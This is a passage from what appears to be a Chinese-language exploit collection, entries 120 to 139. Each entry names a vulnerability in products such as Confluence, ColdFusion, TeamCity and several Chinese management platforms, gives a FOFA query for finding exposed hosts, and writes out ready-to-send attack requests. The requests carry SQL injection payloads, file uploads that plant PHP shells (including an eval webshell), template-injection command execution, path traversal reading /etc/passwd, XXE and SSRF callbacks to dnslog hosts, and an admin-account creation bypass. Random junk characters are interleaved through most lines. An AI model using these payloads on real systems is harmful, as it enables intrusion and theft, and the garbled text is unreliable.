& D* G+ i* t4 }4 k# Q8 v: fX-Originating-Ip: 1.1.1.1
7 j3 [( j2 n2 ~# o6 M- uX-Remote-Ip: 1.1.1.1
8 w# n/ V) d VX-Remote-Addr: 1.1.1.1+ p, m+ A) l: n0 l! K, b& O- X: y4 x5 k
Te: trailers
& b M: Q. H; ~4 [: ?Connection: close
5 O$ w% p( a" z t1 ~) X& |3 k3 a( V: e4 n. a
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
( \/ k! W3 y; k4 C3 B/ A' n$ I) [% F; l
) T4 `2 ?! m1 r2 }120. 北京百绰智能S40管理平台导入web.php任意文件上传6 D' g* U" k4 \
CVE-2024-12536 Z" m& s0 N' `; O9 j9 [
FOFA:title="Smart管理平台") V9 S ^5 R0 G+ R' o: V1 @, I
POST /useratte/web.php? HTTP/1.1
/ H5 w0 n) V1 C0 W/ L2 k) q- FHost: ip:port
! o0 t5 E' A7 I* ~+ LCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db* K" n m. c$ X$ C+ X' C
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
+ }" p2 J8 M! u; H4 U( H" _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! T& u( N" {% H2 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: W+ V% e( ]: x
Accept-Encoding: gzip, deflate* O# n0 U' ^% k; ]& x
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
# P+ @$ E& ^! b5 K- GContent-Length: 597" [7 G' @4 @6 @4 A9 p% P
Origin: https://ip:port, X: b- _$ a9 U; K5 e
Referer: https://ip:port/sysmanage/licence.php8 l6 z( g0 j# i6 q; Y3 L
Upgrade-Insecure-Requests: 1
8 V8 j! |4 N8 U, ^* c, T: a) ?Sec-Fetch-Dest: document
( _ Z% ~4 _, E# }* s( Q' J. MSec-Fetch-Mode: navigate- Y- b2 t5 |$ T
Sec-Fetch-Site: same-origin
" G# \3 ~) N+ z" I; qSec-Fetch-User: ?1, N% I0 O! V' s, V; @; j
Te: trailers: T# F$ ?8 A9 O+ b- F( v
Connection: close3 i3 ]7 o6 }7 F: G! D$ v6 Z$ c
- h3 N2 r: p- w! X- B7 {
-----------------------------42328904123665875270630079328
& s' a& `' x# E) k" Q0 E5 DContent-Disposition: form-data; name="file_upload"; filename="2.php"
3 F- G3 T8 b) ]. O3 H* b n4 w* oContent-Type: application/octet-stream* N, }, f7 m3 Q, G% b! ?
7 ]9 k6 \2 S! a! k" X<?php phpinfo()?>
3 \3 N+ i. I. w4 j-----------------------------42328904123665875270630079328: U. y& L- V! z9 x
Content-Disposition: form-data; name="id_type"/ W% | C2 o( f4 z+ ^
0 j; U2 @0 L# U0 s3 q7 `/ Q1# o' T$ k4 Z( t
-----------------------------423289041236658752706300793289 r* R G2 w) Q% N- G
Content-Disposition: form-data; name="1_ck"
) I& U) q% \) d2 N) z
5 K& p9 Q0 k% `6 T: S. ~1_radhttp
6 G: L" E/ R% J6 {* H7 e-----------------------------423289041236658752706300793282 j7 I2 }+ S2 r, d) [
Content-Disposition: form-data; name="mode"& K1 n9 U+ J" I/ p+ C* ]$ j
/ ^, [& \; L5 w) K$ @4 ]; \import
* |7 [8 T T+ f* H! `2 e-----------------------------423289041236658752706300793285 o3 O. \- E) G( s6 \
2 o) _) t$ \) j( S4 M+ ~
: w8 U1 f( B* S
文件路径/upload/2.php, Y" V' e& \7 u9 `* V, ~
- \4 A9 f9 v) E( [2 ~+ W) J1 L! I2 K
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
- j8 I5 `, u" p1 P* E# RCVE-2024-1918
' @1 i; G% ? ^& L: B9 eFOFA:title="Smart管理平台"7 u9 s4 i- L5 D4 [! F3 D! t9 I2 W
POST /useratte/userattestation.php HTTP/1.1
2 h- C$ w7 F3 X5 [Host: 192.168.40.130:8443' `/ A& F3 B3 H, Y! Y( x' A
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50$ f/ K/ O8 h9 U+ p* d
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
E; K. R1 v8 z, H9 n1 P1 n$ sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! @9 f7 R3 F' Q% S2 X6 }& `) yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) x& c$ V, q8 a: A
Accept-Encoding: gzip, deflate" x) l! u& m# {0 z5 O2 o
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
# d7 S+ [9 [$ P0 R9 b7 gContent-Length: 592
' r& K* W/ B. gOrigin: https://192.168.40.130:84432 p/ a* p, F! h R" w1 W2 [0 ^
Upgrade-Insecure-Requests: 1
- V. a! A7 w' w$ DSec-Fetch-Dest: document) r( O; N% g: a9 C. L0 z4 d2 A
Sec-Fetch-Mode: navigate: |; T# m1 i7 X8 A' a. V
Sec-Fetch-Site: same-origin+ r& J7 g) ]0 O& }4 {+ f
Sec-Fetch-User: ?1
8 K/ {3 U" {" lTe: trailers* z& j" u! v8 E* p7 o
Connection: close* H3 f" t% ?; c: X5 G% d7 y
9 ^9 g0 G. ^! {- s/ B8 l-----------------------------42328904123665875270630079328
2 r* U& @- l, RContent-Disposition: form-data; name="web_img"; filename="1.php"8 z Z9 a9 l% ?, X R) d
Content-Type: application/octet-stream
4 N% _5 e1 W% \ c F' W8 q# _1 i- W" w
<?php phpinfo();?>
* C2 b+ v5 Y; W-----------------------------423289041236658752706300793283 e4 ?5 W- ?' [* K
Content-Disposition: form-data; name="id_type"1 ?4 D# ]2 D+ c5 Y7 }
9 I, c. Q- d9 I/ B& Z8 t' w13 F. x8 c V7 W! m; A7 O: C
-----------------------------42328904123665875270630079328
4 S; N& S2 ^3 c5 p: p' LContent-Disposition: form-data; name="1_ck"
! I" p8 v6 g* P
; q$ c& F% o" |- h1_radhttp8 W8 _) b9 a) p5 ?* {9 y3 T
-----------------------------42328904123665875270630079328: Y, @4 i( W! r# M
Content-Disposition: form-data; name="hidwel"
) F( G3 G" d$ c, E n
+ v Y' ~9 u+ Q; uset
X2 O+ g) x) f( L-----------------------------42328904123665875270630079328
4 X' x% p' S6 F) S, U+ O; Q$ R6 E, F! Z+ j$ O" }5 ~. \
5 L5 F8 `$ G2 h9 w+ m1 a
boot/web/upload/weblogo/1.php k$ u5 k( D" i
7 A4 Z( H/ P( A' j122. 北京百绰智能s200管理平台/importexport.php sql注入3 e& ]4 t6 Y- O" M5 R) |3 ]
CVE-2024-27718FOFA:title="Smart管理平台"" |. b; T) ~. G. c2 D @9 i
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()& u8 o" V/ s7 H1 M6 Q! h0 I
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.17 k$ ^7 T z- F' }4 F" H
Host: x.x.x.x, O4 i2 b: u+ C; {. @) ?9 s; O; P
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc06 G8 G, N6 ~+ a z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% u+ n) g3 o9 _( j, p+ K9 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ |: e5 D' c8 ~6 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! h- y1 h7 o. \3 ]
Accept-Encoding: gzip, deflate, br
: o" F& J% W( D: ^, h* C6 CUpgrade-Insecure-Requests: 11 O6 f( J6 Q0 M3 F* z1 A
Sec-Fetch-Dest: document
1 P4 G; ]; e! \" c8 RSec-Fetch-Mode: navigate1 v6 B2 o. Z* k# j/ K: l
Sec-Fetch-Site: none
8 w8 Y3 Y2 f' R( PSec-Fetch-User: ?1
8 K8 I4 v/ g7 c$ z8 PTe: trailers
9 s) u; r+ r6 C4 CConnection: close
' z" h: O1 H! B1 O H! y7 U
# O" t# }2 P- q- i
3 `1 s; s: Z6 p( X @7 {2 N123. Atlassian Confluence 模板注入代码执行
0 K* K( K% j0 t# KFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
0 B4 f8 o! `- U" _. m8 oPOST /template/aui/text-inline.vm HTTP/1.1
4 R; [! b) |: x, z( K$ p3 m- WHost: localhost:8090
- c: P" d8 W* V" q$ BAccept-Encoding: gzip, deflate, br/ z& k2 G- c7 U, O0 @
Accept: */*0 k) K1 `) u( l
Accept-Language: en-US;q=0.9,en;q=0.8
) c- _3 S8 y5 S- o1 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
3 J5 e" f( P! y3 A3 nConnection: close4 h4 I& y: @; |. y! |& |
Content-Type: application/x-www-form-urlencoded) b$ R A; i7 y/ `
8 c( ^8 l" M; \3 j0 e6 O
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))1 f% \* Y" I! M- b6 t
8 ?- S2 H! E4 ]
; |: f0 Z- z) I; L* {& t U124. 湖南建研工程质量检测系统任意文件上传% r. r4 J4 |0 m! b. q+ `# q2 ?) j6 E
FOFA:body="/Content/Theme/Standard/webSite/login.css". h) E" ?) g! b. O1 q6 ^
POST /Scripts/admintool?type=updatefile HTTP/1.1
6 F* J! K1 z* LHost: 192.168.40.130:8282: \6 c2 M+ {/ x% J
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 C. ?+ D/ U6 ]5 A& `" ?7 d! e% E/ XContent-Length: 72
* T# q4 V0 x2 W( P3 w8 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
" k6 w' W1 r/ _- g# D# BAccept-Encoding: gzip, deflate, br
" j7 [: B, }$ M* GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 ^# N- R1 x+ E3 c$ z: c# ]# Z
Connection: close6 A+ L1 ]3 c& b b' j" t5 O
Content-Type: application/x-www-form-urlencoded( A: a/ c+ M4 x8 V: z1 i
' `7 B" y! h% F X k3 v) Y( d- BfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>; U/ T+ n3 T5 ?3 c" } V
6 }, U* n+ V9 R- l5 T/ P* f' \& e
7 v% A9 w' h) X7 ihttp://192.168.40.130:8282/Scripts/abcgcg.aspx
, A3 n% o1 y; [) k) {; o+ C) O' L7 N2 ` E+ f
125. ConnectWise ScreenConnect身份验证绕过
3 @6 A: o) e4 J- m) N2 I2 t2 [CVE-2024-1709
2 Z$ V3 i5 \, h5 ^+ N1 NFOFA:icon_hash="-82958153"
- X& E- G; \% w8 Hhttps://github.com/watchtowrlabs ... bypass-add-user-poc
' [' n* K# v% i9 {) o S( Q* p d- u6 ~! T3 _
. {6 l* i* o6 ^- g, F
使用方法
3 x0 D6 V4 }' H4 j& Z- ]python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!; Y1 ^7 N9 b, ^7 Z5 _
3 t6 D) Q# s1 b5 f
( \$ u: Z* c W
创建好用户后直接登录后台,可以执行系统命令。8 x. q& m; a- U! h) P" z, E0 M) X
/ p8 o7 m8 [) L8 Z
126. Aiohttp 路径遍历8 ]5 A: @* x: A" F' o
FOFA:title=="ComfyUI"
# W, h7 P$ L% d7 f) z5 N- ^GET /static/../../../../../etc/passwd HTTP/1.1
5 p, X& D2 Z; T/ t4 @+ n. mHost: x.x.x.x
$ W0 a) Q, m3 x# tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36& ^, q) @( n2 g/ J; V7 }3 r
Connection: close) S7 S/ z, j9 l+ {& L; y. t
Accept: */*2 [' w. v( P% b1 I" a/ }: x) n
Accept-Language: en0 x! e9 R% q) S2 v$ w, j
Accept-Encoding: gzip
- R' J6 W. \( L8 t; W2 r
& S& N4 n6 v6 f3 ?2 K5 v4 ?
+ ?% b& N' c r127. 广联达Linkworks DataExchange.ashx XXE
1 l" B1 H3 Y" [9 DFOFA:body="Services/Identification/login.ashx" 9 a" S I4 Q) ^% c" A
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
( [0 B G4 `; q0 _* h+ ^Host: 192.168.40.130:8888; j7 V- v. Q9 y2 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
( {0 }0 p7 o& z- KContent-Length: 415# z8 R$ P. \6 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 w* F5 O; ]# g4 a
Accept-Encoding: gzip, deflate
3 P0 b ^4 M1 @Accept-Language: zh-CN,zh;q=0.9: P. E) t' g$ \6 q! e+ q2 G5 ^
Connection: close
7 D# b8 g1 ~; q! e) CContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
K5 I5 C N5 W" G8 E) t3 ~0 DPurpose: prefetch
) \9 Y4 u# \2 V$ J# ~& ?3 dSec-Purpose: prefetch;prerender4 P! b7 W0 p f* u$ j0 v
2 |" S5 B0 h g0 b: [( Q2 d
------WebKitFormBoundaryJGgV5l5ta05yAIe0
* X5 U a. M- hContent-Disposition: form-data;name="SystemName"
8 o& a$ p. P3 r& ?# d9 f/ f! k5 H/ T/ g9 q. }2 l) E3 u& f. w
BIM, f5 l. K( O" ?! `
------WebKitFormBoundaryJGgV5l5ta05yAIe0( o0 m+ I) `" P7 L' s& S
Content-Disposition: form-data;name="Params"- B2 j, i0 |* \* o/ ^ e
Content-Type: text/plain
: t, v! |$ l1 b5 d1 x7 l$ h) H( {6 v$ O# b
<?xml version="1.0" encoding="UTF-8"?># y+ @5 R, x. ?
<!DOCTYPE test [; s" c8 U5 R3 b* l& ?
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
6 C. G; D' ]) c& X]7 S) f8 C) ~5 A# z
>3 _1 E; L# C. V! Q* H3 v6 E
<test>&t;</test>
- U8 Z/ K4 u( b. L5 x------WebKitFormBoundaryJGgV5l5ta05yAIe0--- a. h$ [6 V8 Z) A
7 T/ b. T. G8 E9 D' x2 Y1 b
; E6 z& o* {# W. g% Y1 k
6 B, f+ R7 Q7 b: Y8 Y; K$ a$ E128. Adobe ColdFusion 反序列化
: [+ a9 s H( ~2 y1 C& \! L* ^" KCVE-2023-38203: Q3 C2 D- ]" `! N( B( G
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
9 k% e1 H S6 J/ X: O( }7 cFOFA:app="Adobe-ColdFusion"5 L8 c* Y# W" t! j5 b' R
PAYLOAD$ b7 Y, K3 f, z$ P- ~2 e
! c( J4 c2 d% T! R! Z6 x
129. Adobe ColdFusion 任意文件读取: P* s3 m4 X! E* k
CVE-2024-20767
\5 p6 ~: a6 W) wFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
! w$ z- z9 P, u7 E! A% n第一步,获取uuid4 }# e* Q& ], \1 [" j+ @
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
F1 T+ q1 B8 u/ |1 x8 x! G! hHost: x.x.x.x
& O. L R1 s4 \# W' F, u5 P! FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; y# i% r& L9 x, Y# a# p7 c
Accept: */*
: c5 y6 @9 s$ K s0 X* jAccept-Encoding: gzip, deflate
' Y1 B- `1 y+ f9 jConnection: close
) A( Z" @! k/ K4 N8 }) V
. C Q. N9 b( |6 b6 g! l, A$ C- Q7 m+ i$ x! \$ K4 f
第二步,读取/etc/passwd文件
" e0 v# B. h# s) |1 k* ^GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1* ~8 q7 S% k3 X7 y3 n
Host: x.x.x.x1 a* j. P8 P( ~5 O$ w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( N2 m( r6 I/ `: T9 t9 C* j; HAccept: */*" ?8 _$ d5 u; M) U3 @. N% w' Z
Accept-Encoding: gzip, deflate
: y) w3 U1 T. W% CConnection: close
6 Q C5 J2 |- }, P3 _' x, J6 \; Iuuid: 85f60018-a654-4410-a783-f81cbd5000b93 v% E1 H. T R- ]& {4 L6 i
: {: U H( _3 C. k9 _) v
2 G' w% k$ K( V
130. Laykefu客服系统任意文件上传$ K8 n& j' {" N ]4 |+ w! ?7 [
FOFA:icon_hash="-334624619"8 V( w0 k6 V5 b3 ~) |" |: Z; p
POST /admin/users/upavatar.html HTTP/1.1
6 {: t* u+ x/ Y; F7 h$ UHost: 127.0.0.1
4 e+ i$ y% ~# d1 wAccept: application/json, text/javascript, */*; q=0.01
5 u9 V/ _! y& r# ?' ]7 G; sX-Requested-With: XMLHttpRequest
9 {) n: ?7 J( yUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26+ E5 F, G q. u% j$ V. Z M; `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR6 n2 [0 z o8 Q* B( a6 Y* _5 F4 [# k
Accept-Encoding: gzip, deflate: G1 H: [/ W6 y% _; v1 S
Accept-Language: zh-CN,zh;q=0.9
, e! T5 A5 W/ c$ N4 K6 @' j& n- gCookie: user_name=1; user_id=36 m" r1 ~, Y# h! [% ]. j7 F$ ]- C
Connection: close
* D& [. h; |# J( Q* {
* |; \9 G6 I8 e: G9 P7 N! k7 a! l------WebKitFormBoundary3OCVBiwBVsNuB2kR
: j# Y _; S" E/ A0 G9 J; b; cContent-Disposition: form-data; name="file"; filename="1.php", k$ T& X& @; K( @) o6 `1 D
Content-Type: image/png
$ Q F0 N% @8 X8 _
9 p, S h+ D" u4 i6 a<?php phpinfo();@eval($_POST['sec']);?>
* T6 y' [1 S/ Z0 f" f2 _* V" z------WebKitFormBoundary3OCVBiwBVsNuB2kR--
- Y4 V. X8 C, B, I2 Q8 m( _( ?
( a0 }& c; _- V. R6 V+ S2 L! ^. j* A K: c. \% h2 o) Z
131. Mini-Tmall <=20231017 SQL注入* S1 a) v) u2 O5 t8 l: @! X) L
FOFA:icon_hash="-2087517259"" w7 [% P* n8 t& ]7 Y
后台地址:http://localhost:8080/tmall/admin$ Y, m/ {8 T* }/ ^" f1 h, Z$ A! }! w
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)+ P4 G& K3 H2 Y" z- p+ H
9 `3 G; {" t: B# N9 F4 o3 n7 H132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; Q# U. ?5 G& M2 B% Y5 s& c. N( X, H
CVE-2024-27198
; o" h9 ?2 l5 p* {FOFA:body="Log in to TeamCity") g8 T8 Y: R4 ~& Z' \/ r- R, G" l' e
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
& m, Q; t! K, h' e0 RHost: 192.168.40.130:8111+ a3 p0 b' J0 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 E: ?, H3 U; m! v& \$ D/ @Accept: */** P& H& O2 S0 B3 U% t- X
Content-Type: application/json
. \: p% ]4 |9 ~' w* fAccept-Encoding: gzip, deflate
- A( |! ^9 M% r8 H5 w4 P! E3 l0 a
! A0 M9 T9 k/ e2 Z/ E" {8 m6 h{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
0 @4 T: q& I7 N- ?# v% M/ Y8 d7 c* I0 U5 `( X: R
! J( A. W7 I& w# e
CVE-2024-27199# i/ E$ k3 W8 I, M
/res/../admin/diagnostic.jsp7 G8 r- b5 b; K' b, U$ t& A" z
/.well-known/acme-challenge/../../admin/diagnostic.jsp2 F8 H' ?3 v2 q% G& X% T, y* n& T
/update/../admin/diagnostic.jsp
4 u5 U' G! a& M! G0 ~9 c& V8 t; x- t/ U' O
8 O% w2 v8 x/ A- g8 Q9 h1 h
CVE-2024-27198-RCE.py( S2 q0 S/ {# O% K$ F6 `2 K7 D
. J0 q; A- p! n
133. H5 云商城 file.php 文件上传4 ?, g; i$ h- M2 R
FOFA:body="/public/qbsp.php"
. F' ^6 f* R# x# v% y# CPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
, V9 ~. i5 S, G7 |8 F( _+ HHost: your-ip$ E; H- ~- [2 N5 K7 U8 w( Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 e/ q+ d# Q1 [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx. a, r3 Y. X4 b# v
+ g* E# Q8 [, U& @1 }+ t S
------WebKitFormBoundaryFQqYtrIWb8iBxUCx$ i8 S) r& l) |
Content-Disposition: form-data; name="file"; filename="rce.php"* e. N3 f- }8 Z' r
Content-Type: application/octet-stream: a) U% z+ K& s- A, u0 J
2 u. x4 E0 T- n<?php system("cat /etc/passwd");unlink(__FILE__);?>7 J4 e6 r0 a( |! q( r# a9 |
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
0 h9 w# Y$ `3 z6 ^4 `
+ \* d/ n0 y( b; @# D6 S: C% N* c2 O2 n7 t( X8 a
- y4 i8 V% t5 `6 V" X
134. 网康NS-ASG应用安全网关index.php sql注入
4 `& W) B% I; N4 B) FCVE-2024-2330$ t# x) I' d6 I) V V5 Z
Netentsec NS-ASG Application Security Gateway 6.3版本
, Y$ |7 ~% U5 ^9 L1 \' g& n% i# kFOFA:app="网康科技-NS-ASG安全网关"
! g, R; L( X# t& c! APOST /protocol/index.php HTTP/1.1
" g" T4 a* b$ i+ l6 G6 p1 EHost: x.x.x.x
2 I, {: H$ u2 d" ^0 RCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
# G2 v3 j1 {6 z5 _/ OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0* Q2 H0 ]: K7 v0 c4 f6 |
Accept: */*/ i$ I8 h1 ?" ]) F" f8 u# C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% v- q9 j: S/ R0 `# ?( f, X) RAccept-Encoding: gzip, deflate
% z+ y I T6 D9 n3 aSec-Fetch-Dest: empty$ j9 X2 F$ F$ X9 t9 J$ m8 y) f
Sec-Fetch-Mode: cors
* y, _) i( n+ W0 t0 K! D3 {/ G% F% bSec-Fetch-Site: same-origin
3 R+ t& O" U' a( Z h% xTe: trailers
' a9 t; b6 O# o: e: p7 C* iConnection: close
9 |/ p; m" N; F9 n( x/ _- S* qContent-Type: application/x-www-form-urlencoded9 G) l. ? q/ o" j$ q) `7 w/ y* Z
Content-Length: 263% H1 M; G" O' a
- {& D c, p p% w) w% R) Xjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}/ m8 {& z7 h9 i* k8 V
4 g. i1 u$ } S, w8 ^3 y) b5 s. _) F( L; \6 f% V
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入. m( z y1 z" c3 L5 D" }
CVE-2024-20227 n; w+ i% {9 S9 Z; [4 T4 C8 @% T7 z7 l
Netentsec NS-ASG Application Security Gateway 6.3版本/ X3 t4 n# M6 Q( u7 h
FOFA:app="网康科技-NS-ASG安全网关"8 U# v z4 t! c0 x
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
3 u( ~/ B8 O" E5 jHost: x.x.x.x" _3 u( O+ I* E- j, i: Q/ L/ l$ E) T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& Z2 h. C: h' m1 p. y! bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. x! v0 Y* y/ ]) N- i2 X5 e# \
Accept-Encoding: gzip, deflate+ z3 s/ |+ @! e( Q! p, N; O+ |
Accept-Language: zh-CN,zh;q=0.9
) G3 |: e7 B% c3 f4 f' \Connection: close
% j( a+ q0 w5 l2 k
8 M- G: m. ]. x" E
& {; J& \3 i( W6 S136. NextChat cors SSRF
8 s6 q0 J4 j. E1 M( XCVE-2023-49785: H3 L8 n4 W5 @# i
FOFA:title="NextChat"3 F3 S/ g# X% {
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1! z, ~3 T% \- s
Host: x.x.x.x:10000
6 o! W: L! f: w% V! rUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 Q- K- g; u& C
Connection: close
. w( x: e; o( NAccept: */*, ?$ \3 j( S- V, \! H
Accept-Language: en( \0 Q# J5 \7 ^- J) B% L& ~: _
Accept-Encoding: gzip
1 L( ^0 v! B2 x/ E$ ~! l, D0 s$ L# r" u3 @. M9 z( f+ K; s
; l: F& W# }9 q0 h: H" m/ B
137. 福建科立迅通信指挥调度平台down_file.php sql注入( Z4 W* o7 [0 Y" B. z
CVE-2024-2620
) \5 E1 i2 w& p% nFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 e* l s9 Q1 L0 IGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.10 w$ T7 v3 [! K2 |' x/ i
Host: x.x.x.x9 P5 A6 g4 ?" B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ I1 t8 O6 y5 r9 Q! x" i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% [2 P& |) {: @' `& f; t# E+ BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 _2 x- y! k a. c6 ?9 F% |# p
Accept-Encoding: gzip, deflate, br
{, o# y- c6 q! V' I$ o( t1 RConnection: close5 G8 b2 M2 [, W m# |
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj; V8 w2 u _" B5 S9 W4 T+ R% |
Upgrade-Insecure-Requests: 1
K1 R0 t6 ~2 t9 z% H5 U
0 `( z$ |4 y+ s2 Q. R
: U5 j4 F. Q' R3 |8 H138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
$ v1 O$ v% O, n" S8 E# [CVE-2024-2621! k. d8 g# G2 K/ y8 O r
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台" a! p5 R2 X n7 \+ |
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
. n7 P, W& W# t& x2 S* l' {Host: x.x.x.x
! }" l- H7 {, r( H/ @* Q$ m+ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; h& e V+ c5 Z/ nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 _* y- s1 W, P; h/ p3 U# \0 XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! j8 }! H: ?) \7 q. Y
Accept-Encoding: gzip, deflate, br8 h9 W! T# G( M- R1 ^
Connection: close) F/ ^: @; Y2 P# ?% C$ C
Upgrade-Insecure-Requests: 1
3 R' t' T: F: C* w5 f; \9 X5 O- J- R" Q5 Q
! X% C0 d2 V2 m7 Q; X
139. 福建科立讯通信指挥调度平台editemedia.php sql注入; |* v! D( J( a0 G% I0 t3 H
CVE-2024-2622
